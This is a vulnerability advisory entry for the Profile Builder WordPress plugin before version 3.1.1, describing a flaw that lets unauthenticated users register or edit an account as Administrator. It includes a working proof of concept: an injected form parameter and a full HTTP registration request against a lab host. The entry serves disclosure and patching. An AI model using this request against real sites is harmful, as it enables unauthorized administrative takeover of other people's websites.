Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role



Description
The plugin is affected by a broken authentication vulnerability, allowing unauthenticated users to register or edit their account and gain the Administrator role using the plugin's forms.

The vulnerability only exists in the Plugin's own generated Registration Form or Profile Edit Form. This means if the blog is using shortcode [wppb-register] or [wppb-edit-profile] then it is vulnerable. This is very obvious shortcode which holds the basic functionality of the plugin so admin must be using it 90% of time if installed. If blog isn't using [wppb-register] but using [wppb-edit-profile] then vulnerability is still valid if Registration is enabled. CVSS Score of the vulnerability is 9.
Proof of Concept
Adding following extra parameter in registration form POST input or profile edit POST input will add/upgrade user to Administrator.

custom_field_user_role=administrator

The problem is in line number 194 of file profile-builder/front-end/default-fields/user-role/user-role.php as per latest version 3.1.0

POST /wordpress-5.3.2/register/ HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21180001813424994471925010347
Content-Length: 1686
Origin: http://wp.lab
DNT: 1
Connection: close
Referer: http://wp.lab/wordpress-5.3.2/register/
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="username"

test
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="first_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="last_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="nickname"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="email"

test@localhost.org
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="custom_field_user_role"

administrator
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="description"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw1"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw2"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="action"

register
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="form_name"

unspecified
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="register_unspecified_nonce_field"

d02f43e49c
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress-5.3.2/register/
-----------------------------21180001813424994471925010347--

Affects Plugins

fixed in version 3.1.1

References

URL https://www.wordfence.com/blog/2020/02/critical-vulnerability-in-profile-builder-plugin-allowed-site-takeover/

Classification

Type BYPASS

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Views 6128
Verified Yes
WPVDB ID 10066

Timeline

Publicly Published 2020-02-10 (4 months ago)
Added 2020-02-10 (4 months ago)
Last Updated 2020-02-15 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin